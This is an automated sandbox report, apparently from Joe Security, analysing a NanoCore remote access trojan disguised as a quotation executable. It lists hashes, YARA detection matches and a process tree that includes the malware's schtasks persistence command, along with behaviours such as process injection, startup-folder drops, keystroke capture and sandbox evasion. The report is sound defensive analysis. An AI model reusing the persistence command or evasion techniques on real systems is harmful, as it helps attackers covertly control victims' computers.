Play interactive tour

Edit tour

Analysis Report Quotation ATB-PR28500KINH.exe

Overview

General Information

Sample Name:	Quotation ATB-PR28500KINH.exe
Analysis ID:	321077
MD5:	5a6b8a02021146dbe686b9a5eb628d9a
SHA1:	7dc888c1f8a38a4a7385f666fcee60bab258a869
SHA256:	7fa804f096ed67a239a1fa164ba4a63f06b6fd52f3163c82f096cc12082acca9
Tags:	exeNanoCoreRAT
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Drops PE files to the startup folder

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Yara signature match

Classification

Startup

System is w10x64

Quotation ATB-PR28500KINH.exe (PID: 6620 cmdline: 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe' MD5: 5A6B8A02021146DBE686B9A5EB628D9A)

RegAsm.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6916 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

schtasks.exe (PID: 7012 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Quotation ATB-PR28500KINH.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe' MD5: 5A6B8A02021146DBE686B9A5EB628D9A)

RegAsm.exe (PID: 7048 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 7088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6b44f:$a: NanoCore 0x6b4a8:$a: NanoCore 0x6b4e5:$a: NanoCore 0x6b55e:$a: NanoCore 0x6b4b1:$b: ClientPlugin 0x6b4ee:$b: ClientPlugin 0x6bdec:$b: ClientPlugin 0x6bdf9:$b: ClientPlugin 0x615ba:$e: KeepAlive 0x6b939:$g: LogClientMessage 0x6b8b9:$i: get_Connected 0x5b885:$j: #=q 0x5b8b5:$j: #=q 0x5b8f1:$j: #=q 0x5b919:$j: #=q 0x5b949:$j: #=q 0x5b979:$j: #=q 0x5b9a9:$j: #=q 0x5b9d9:$j: #=q 0x5b9f5:$j: #=q 0x5ba25:$j: #=q
00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4359d:$a: NanoCore 0x435f6:$a: NanoCore 0x43633:$a: NanoCore 0x436ac:$a: NanoCore 0x56d57:$a: NanoCore 0x56d6c:$a: NanoCore 0x56da1:$a: NanoCore 0x6fd33:$a: NanoCore 0x6fd48:$a: NanoCore 0x6fd7d:$a: NanoCore 0x435ff:$b: ClientPlugin 0x4363c:$b: ClientPlugin 0x43f3a:$b: ClientPlugin 0x43f47:$b: ClientPlugin 0x56b13:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56b5e:$b: ClientPlugin 0x56d75:$b: ClientPlugin 0x56daa:$b: ClientPlugin 0x6faef:$b: ClientPlugin 0x6fb0a:$b: ClientPlugin
00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10efd:$x1: NanoCore.ClientPluginHost 0x10f3a:$x2: IClientNetworkHost 0x14a6d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10c65:$a: NanoCore 0x10c75:$a: NanoCore 0x10ea9:$a: NanoCore 0x10ebd:$a: NanoCore 0x10efd:$a: NanoCore 0x10cc4:$b: ClientPlugin 0x10ec6:$b: ClientPlugin 0x10f06:$b: ClientPlugin 0x10deb:$c: ProjectData 0x117f2:$d: DESCrypto 0x191be:$e: KeepAlive 0x171ac:$g: LogClientMessage 0x133a7:$i: get_Connected 0x11b28:$j: #=q 0x11b58:$j: #=q 0x11b74:$j: #=q 0x11ba4:$j: #=q 0x11bc0:$j: #=q 0x11bdc:$j: #=q 0x11c0c:$j: #=q 0x11c28:$j: #=q
00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4359d:$a: NanoCore 0x435f6:$a: NanoCore 0x43633:$a: NanoCore 0x436ac:$a: NanoCore 0x56d57:$a: NanoCore 0x56d6c:$a: NanoCore 0x56da1:$a: NanoCore 0x6fd33:$a: NanoCore 0x6fd48:$a: NanoCore 0x6fd7d:$a: NanoCore 0x435ff:$b: ClientPlugin 0x4363c:$b: ClientPlugin 0x43f3a:$b: ClientPlugin 0x43f47:$b: ClientPlugin 0x56b13:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56b5e:$b: ClientPlugin 0x56d75:$b: ClientPlugin 0x56daa:$b: ClientPlugin 0x6faef:$b: ClientPlugin 0x6fb0a:$b: ClientPlugin
00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4a175:$x1: NanoCore.ClientPluginHost 0x4a1b2:$x2: IClientNetworkHost 0x4dce5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x49edd:$a: NanoCore 0x49eed:$a: NanoCore 0x4a121:$a: NanoCore 0x4a135:$a: NanoCore 0x4a175:$a: NanoCore 0x49f3c:$b: ClientPlugin 0x4a13e:$b: ClientPlugin 0x4a17e:$b: ClientPlugin 0x4a063:$c: ProjectData 0x4aa6a:$d: DESCrypto 0x52436:$e: KeepAlive 0x50424:$g: LogClientMessage 0x4c61f:$i: get_Connected 0x4ada0:$j: #=q 0x4add0:$j: #=q 0x4adec:$j: #=q 0x4ae1c:$j: #=q 0x4ae38:$j: #=q 0x4ae54:$j: #=q 0x4ae84:$j: #=q 0x4aea0:$j: #=q
00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 6916	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe8684:$x1: NanoCore.ClientPluginHost 0xee243:$x1: NanoCore.ClientPluginHost 0xff5bd:$x1: NanoCore.ClientPluginHost 0x179f3b:$x1: NanoCore.ClientPluginHost 0x19e634:$x1: NanoCore.ClientPluginHost 0x260182:$x1: NanoCore.ClientPluginHost 0xe86aa:$x2: IClientNetworkHost 0xee288:$x2: IClientNetworkHost 0xff602:$x2: IClientNetworkHost 0x179f80:$x2: IClientNetworkHost 0x19e695:$x2: IClientNetworkHost 0x2601a8:$x2: IClientNetworkHost 0x1a3a9a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1b1a0c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 6916	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 6916	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x75ff:$a: NanoCore 0xe8576:$a: NanoCore 0xe8617:$a: NanoCore 0xe8684:$a: NanoCore 0xe8745:$a: NanoCore 0xe9616:$a: NanoCore 0xe9669:$a: NanoCore 0xe96a2:$a: NanoCore 0xe9715:$a: NanoCore 0xee1bd:$a: NanoCore 0xee1ea:$a: NanoCore 0xee243:$a: NanoCore 0xf5a52:$a: NanoCore 0xf5a65:$a: NanoCore 0xf5a97:$a: NanoCore 0xff537:$a: NanoCore 0xff564:$a: NanoCore 0xff5bd:$a: NanoCore 0x106dcc:$a: NanoCore 0x106ddf:$a: NanoCore 0x106e11:$a: NanoCore
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5d300:$x1: NanoCore.ClientPluginHost 0xc3561:$x1: NanoCore.ClientPluginHost 0xeadbc:$x1: NanoCore.ClientPluginHost 0x5d361:$x2: IClientNetworkHost 0xc35c2:$x2: IClientNetworkHost 0xeae1d:$x2: IClientNetworkHost 0x62766:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x706d8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc89c7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd6939:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xf0222:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xfe194:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x5ce05:$a: NanoCore 0x5ce21:$a: NanoCore 0x5cf7c:$a: NanoCore 0x5cf8b:$a: NanoCore 0x5d264:$a: NanoCore 0x5d290:$a: NanoCore 0x5d300:$a: NanoCore 0x6cd42:$a: NanoCore 0x6cd54:$a: NanoCore 0x6cd90:$a: NanoCore 0xc3066:$a: NanoCore 0xc3082:$a: NanoCore 0xc31dd:$a: NanoCore 0xc31ec:$a: NanoCore 0xc34c5:$a: NanoCore 0xc34f1:$a: NanoCore 0xc3561:$a: NanoCore 0xd2fa3:$a: NanoCore 0xd2fb5:$a: NanoCore 0xd2ff1:$a: NanoCore 0xea8c1:$a: NanoCore
Process Memory Space: RegAsm.exe PID: 7048	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x28277:$x1: NanoCore.ClientPluginHost 0x34877:$x1: NanoCore.ClientPluginHost 0x3a436:$x1: NanoCore.ClientPluginHost 0x4b7c7:$x1: NanoCore.ClientPluginHost 0x637e0:$x1: NanoCore.ClientPluginHost 0x2829d:$x2: IClientNetworkHost 0x3489d:$x2: IClientNetworkHost 0x3a47b:$x2: IClientNetworkHost 0x4b80c:$x2: IClientNetworkHost 0x63841:$x2: IClientNetworkHost 0x68c46:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x76bb8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 7048	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7048	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x85f:$a: NanoCore 0x8c6:$a: NanoCore 0x96a:$a: NanoCore 0x28169:$a: NanoCore 0x2820a:$a: NanoCore 0x28277:$a: NanoCore 0x28338:$a: NanoCore 0x29209:$a: NanoCore 0x2925c:$a: NanoCore 0x29295:$a: NanoCore 0x29308:$a: NanoCore 0x2ac17:$a: NanoCore 0x2acf8:$a: NanoCore 0x2ad14:$a: NanoCore 0x2ad30:$a: NanoCore 0x2ad4c:$a: NanoCore 0x2d570:$a: NanoCore 0x34769:$a: NanoCore 0x3480a:$a: NanoCore 0x34877:$a: NanoCore 0x34938:$a: NanoCore
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x17082:$x1: NanoCore.ClientPluginHost 0xf7bce:$x1: NanoCore.ClientPluginHost 0x170e3:$x2: IClientNetworkHost 0xf7c2f:$x2: IClientNetworkHost 0x1c4e8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2a45a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xfd034:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x10afa6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x16b87:$a: NanoCore 0x16ba3:$a: NanoCore 0x16cfe:$a: NanoCore 0x16d0d:$a: NanoCore 0x16fe6:$a: NanoCore 0x17012:$a: NanoCore 0x17082:$a: NanoCore 0x26ac4:$a: NanoCore 0x26ad6:$a: NanoCore 0x26b12:$a: NanoCore 0xf76d3:$a: NanoCore 0xf76ef:$a: NanoCore 0xf784a:$a: NanoCore 0xf7859:$a: NanoCore 0xf7b32:$a: NanoCore 0xf7b5e:$a: NanoCore 0xf7bce:$a: NanoCore 0x107610:$a: NanoCore 0x107622:$a: NanoCore 0x10765e:$a: NanoCore 0x16c2e:$b: ClientPlugin
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
18.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
